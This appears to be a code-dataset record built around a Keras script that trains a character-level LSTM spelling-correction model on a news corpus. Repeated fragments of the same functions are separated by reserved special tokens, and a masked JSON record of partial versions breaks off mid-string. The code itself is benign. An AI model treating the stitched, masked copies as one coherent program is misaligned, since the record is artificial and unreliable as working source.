fail = '\x1b[91m'
close = '\x1b[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([
ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1])
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else
Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_CHECKPOINT_FILENAME, save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:
show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator, samples_per_epoch=
SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=
validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger,
show_samples_callback], verbose=1, initial_epoch=initial_epoch)
def save_dataset_params(dataset):
params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}
with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:
pickle.dump(params, f)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)
), init=INITIALIZATION, return_sequences=layer_number + 1 <
INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(RepeatVector(output_len))
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=
INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\x1b[92m'
fail = '\x1b[91m'
close = '\x1b[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([
ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1])
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else
Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_CHECKPOINT_FILENAME, save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:
show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator, samples_per_epoch=
SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=
validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger,
show_samples_callback], verbose=1, initial_epoch=initial_epoch)
def save_dataset_params(dataset):
params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}
with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:
pickle.dump(params, f)
def main_news(checkpoint_filename=None, dataset_params_filename=None,
initial_epoch=1):
"""Main"""
dataset = DataSet(DATASET_FILENAME)
if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):
os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)
if dataset_params_filename is not None:
with open(dataset_params_filename, 'rb') as f:
dataset_params = pickle.load(f)
assert dataset_params['chars'] == dataset.chars
assert dataset_params['y_max_length'] == dataset.y_max_length
else:
save_dataset_params(dataset)
model = generate_model(dataset.y_max_length, dataset.chars)
if checkpoint_filename is not None:
model.load_weights(checkpoint_filename)
iterate_training(model, dataset, initial_epoch)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
random_seed(123)
DATASET_FILENAME = 'data/dataset/news.2011.en.shuffled'
NUMBER_OF_EPOCHS = 100000
RNN = recurrent.LSTM
INPUT_LAYERS = 2
OUTPUT_LAYERS = 2
AMOUNT_OF_DROPOUT = 0.3
BATCH_SIZE = 32
SAMPLES_PER_EPOCH = 65536
HIDDEN_SIZE = 700
INITIALIZATION = 'he_normal'
NUMBER_OF_CHARS = 100
CHARS = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ .')
INVERTED = True
MODEL_CHECKPOINT_DIRECTORYNAME = 'models'
MODEL_CHECKPOINT_FILENAME = 'weights.{epoch:02d}-{val_loss:.2f}.hdf5'
MODEL_DATASET_PARAMS_FILENAME = 'dataset_params.pickle'
MODEL_STARTING_CHECKPOINT_FILENAME = 'weights.hdf5'
CSV_LOG_FILENAME = 'log.csv'
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)
), init=INITIALIZATION, return_sequences=layer_number + 1 <
INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(RepeatVector(output_len))
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=
INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\x1b[92m'
fail = '\x1b[91m'
close = '\x1b[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([
ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1])
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else
Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_CHECKPOINT_FILENAME, save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:
show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator, samples_per_epoch=
SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=
validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger,
show_samples_callback], verbose=1, initial_epoch=initial_epoch)
def save_dataset_params(dataset):
params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}
with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:
pickle.dump(params, f)
def main_news(checkpoint_filename=None, dataset_params_filename=None,
initial_epoch=1):
"""Main"""
dataset = DataSet(DATASET_FILENAME)
if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):
os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)
if dataset_params_filename is not None:
with open(dataset_params_filename, 'rb') as f:
dataset_params = pickle.load(f)
assert dataset_params['chars'] == dataset.chars
assert dataset_params['y_max_length'] == dataset.y_max_length
else:
save_dataset_params(dataset)
model = generate_model(dataset.y_max_length, dataset.chars)
if checkpoint_filename is not None:
model.load_weights(checkpoint_filename)
iterate_training(model, dataset, initial_epoch)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=
'Trains a deep spelling model.')
parser.add_argument('--checkpoint', type=str, help=
'Filename of a model checkpoint to start the training from.')
parser.add_argument('--datasetparams', type=str, help=
'Filename of a file with dataset params to load for continuing model training.'
)
parser.add_argument('--initialepoch', type=int, help=
'Initial epoch parameter for continuing model training.', default=0)
args = parser.parse_args()
main_news(args.checkpoint, args.datasetparams, args.initialepoch)
<|reserved_special_token_1|>
# encoding: utf-8
'''
Created on Nov 26, 2015
@author: tal
Based in part on:
Learn math - https://github.com/fchollet/keras/blob/master/examples/addition_rnn.py
See https://medium.com/@majortal/deep-spelling-9ffef96a24f6#.2c9pu8nlm
"""
Modified by Pavel Surmenok
'''
import argparse
import numpy as np
from keras.layers import Activation, TimeDistributed, Dense, RepeatVector, Dropout
from keras.layers import recurrent
from keras.models import Sequential
from keras.callbacks import ModelCheckpoint, TensorBoard, CSVLogger, LambdaCallback
from numpy.random import seed as random_seed
from numpy.random import randint as random_randint
import os
import pickle
from data import DataSet
random_seed(123) # Reproducibility
# Parameters for the model and dataset
DATASET_FILENAME = 'data/dataset/news.2011.en.shuffled'
NUMBER_OF_EPOCHS = 100000
RNN = recurrent.LSTM
INPUT_LAYERS = 2
OUTPUT_LAYERS = 2
AMOUNT_OF_DROPOUT = 0.3
BATCH_SIZE = 32
SAMPLES_PER_EPOCH = 65536
HIDDEN_SIZE = 700
INITIALIZATION = "he_normal" # : Gaussian initialization scaled by fan_in (He et al., 2014)
NUMBER_OF_CHARS = 100 # 75
CHARS = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ .")
INVERTED = True
MODEL_CHECKPOINT_DIRECTORYNAME = 'models'
MODEL_CHECKPOINT_FILENAME = 'weights.{epoch:02d}-{val_loss:.2f}.hdf5'
MODEL_DATASET_PARAMS_FILENAME = 'dataset_params.pickle'
MODEL_STARTING_CHECKPOINT_FILENAME = 'weights.hdf5'
CSV_LOG_FILENAME = 'log.csv'
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
# "Encode" the input sequence using an RNN, producing an output of HIDDEN_SIZE
# note: in a situation where your input sequences have a variable length,
# use input_shape=(None, nb_feature).
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)), init=INITIALIZATION,
return_sequences=layer_number + 1 < INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
# For the decoder's input, we repeat the encoded input for each time step
model.add(RepeatVector(output_len))
# The decoder RNN could be multiple layers stacked or a single layer
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
# For each of step of the output sequence, decide which character should be chosen
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\033[92m'
fail = '\033[91m'
close = '\033[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1]) # inverted back!
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' + MODEL_CHECKPOINT_FILENAME,
save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(
on_epoch_end=lambda epoch, logs: show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator,
samples_per_epoch=SAMPLES_PER_EPOCH,
nb_epoch=NUMBER_OF_EPOCHS,
validation_data=validation_batch_generator,
nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger, show_samples_callback],
verbose=1,
initial_epoch=initial_epoch)
def save_dataset_params(dataset):
params = { 'chars': dataset.chars, 'y_max_length': dataset.y_max_length }
with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' + MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:
pickle.dump(params, f)
def main_news(checkpoint_filename=None, dataset_params_filename=None, initial_epoch=1):
"""Main"""
dataset = DataSet(DATASET_FILENAME)
if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):
os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)
if dataset_params_filename is not None:
with open(dataset_params_filename, 'rb') as f:
dataset_params = pickle.load(f)
assert dataset_params['chars'] == dataset.chars
assert dataset_params['y_max_length'] == dataset.y_max_length
else:
save_dataset_params(dataset)
model = generate_model(dataset.y_max_length, dataset.chars)
if checkpoint_filename is not None:
model.load_weights(checkpoint_filename)
iterate_training(model, dataset, initial_epoch)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Trains a deep spelling model.')
parser.add_argument('--checkpoint', type=str,
help='Filename of a model checkpoint to start the training from.')
parser.add_argument('--datasetparams', type=str,
help='Filename of a file with dataset params to load for continuing model training.')
parser.add_argument('--initialepoch', type=int,
help='Initial epoch parameter for continuing model training.', default=0)
args = parser.parse_args()
main_news(args.checkpoint, args.datasetparams, args.initialepoch)
|
flexible
|
{
"blob_id": "572a098053ebae4f42cd020d1003cc18eceb6af0",
"index": 4984,
"step-1": "<mask token>\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)\n ), init=INITIALIZATION, return_sequences=layer_number + 1 <\n INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(RepeatVector(output_len))\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=\n INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\x1b[92m'\n fail = '\\x1b[91m'\n close = '\\x1b[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([\n ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n if INVERTED:\n print('Q', q[::-1])\n else:\n print('Q', q)\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else \n Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_CHECKPOINT_FILENAME, save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:\n show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n model.fit_generator(train_batch_generator, samples_per_epoch=\n SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=\n validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger,\n show_samples_callback], verbose=1, initial_epoch=initial_epoch)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)\n ), init=INITIALIZATION, return_sequences=layer_number + 1 <\n INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(RepeatVector(output_len))\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=\n INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\x1b[92m'\n fail = '\\x1b[91m'\n close = '\\x1b[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([\n ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n if INVERTED:\n print('Q', q[::-1])\n else:\n print('Q', q)\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else \n Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_CHECKPOINT_FILENAME, save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:\n show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n model.fit_generator(train_batch_generator, samples_per_epoch=\n SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=\n validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger,\n show_samples_callback], verbose=1, initial_epoch=initial_epoch)\n\n\ndef save_dataset_params(dataset):\n params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}\n with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:\n pickle.dump(params, f)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)\n ), init=INITIALIZATION, return_sequences=layer_number + 1 <\n INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(RepeatVector(output_len))\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=\n INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\x1b[92m'\n fail = '\\x1b[91m'\n close = '\\x1b[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([\n ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n if INVERTED:\n print('Q', q[::-1])\n else:\n print('Q', q)\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else \n Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_CHECKPOINT_FILENAME, save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:\n show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n model.fit_generator(train_batch_generator, samples_per_epoch=\n SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=\n validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger,\n show_samples_callback], verbose=1, initial_epoch=initial_epoch)\n\n\ndef save_dataset_params(dataset):\n params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}\n with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:\n pickle.dump(params, f)\n\n\ndef main_news(checkpoint_filename=None, dataset_params_filename=None,\n initial_epoch=1):\n \"\"\"Main\"\"\"\n dataset = DataSet(DATASET_FILENAME)\n if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):\n os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)\n if dataset_params_filename is not None:\n with open(dataset_params_filename, 'rb') as f:\n dataset_params = pickle.load(f)\n assert dataset_params['chars'] == dataset.chars\n assert dataset_params['y_max_length'] == dataset.y_max_length\n else:\n save_dataset_params(dataset)\n model = generate_model(dataset.y_max_length, dataset.chars)\n if checkpoint_filename is not None:\n model.load_weights(checkpoint_filename)\n iterate_training(model, dataset, initial_epoch)\n\n\n<mask token>\n",
"step-4": "<mask token>\nrandom_seed(123)\nDATASET_FILENAME = 'data/dataset/news.2011.en.shuffled'\nNUMBER_OF_EPOCHS = 100000\nRNN = recurrent.LSTM\nINPUT_LAYERS = 2\nOUTPUT_LAYERS = 2\nAMOUNT_OF_DROPOUT = 0.3\nBATCH_SIZE = 32\nSAMPLES_PER_EPOCH = 65536\nHIDDEN_SIZE = 700\nINITIALIZATION = 'he_normal'\nNUMBER_OF_CHARS = 100\nCHARS = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ .')\nINVERTED = True\nMODEL_CHECKPOINT_DIRECTORYNAME = 'models'\nMODEL_CHECKPOINT_FILENAME = 'weights.{epoch:02d}-{val_loss:.2f}.hdf5'\nMODEL_DATASET_PARAMS_FILENAME = 'dataset_params.pickle'\nMODEL_STARTING_CHECKPOINT_FILENAME = 'weights.hdf5'\nCSV_LOG_FILENAME = 'log.csv'\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)\n ), init=INITIALIZATION, return_sequences=layer_number + 1 <\n INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(RepeatVector(output_len))\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=\n INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\x1b[92m'\n fail = '\\x1b[91m'\n close = '\\x1b[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([\n ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n if INVERTED:\n print('Q', q[::-1])\n else:\n print('Q', q)\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else \n Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_CHECKPOINT_FILENAME, save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:\n show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n model.fit_generator(train_batch_generator, samples_per_epoch=\n SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=\n validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger,\n show_samples_callback], verbose=1, initial_epoch=initial_epoch)\n\n\ndef save_dataset_params(dataset):\n params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}\n with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:\n pickle.dump(params, f)\n\n\ndef main_news(checkpoint_filename=None, dataset_params_filename=None,\n initial_epoch=1):\n \"\"\"Main\"\"\"\n dataset = DataSet(DATASET_FILENAME)\n if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):\n os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)\n if dataset_params_filename is not None:\n with open(dataset_params_filename, 'rb') as f:\n dataset_params = pickle.load(f)\n assert dataset_params['chars'] == dataset.chars\n assert dataset_params['y_max_length'] == dataset.y_max_length\n else:\n save_dataset_params(dataset)\n model = generate_model(dataset.y_max_length, dataset.chars)\n if 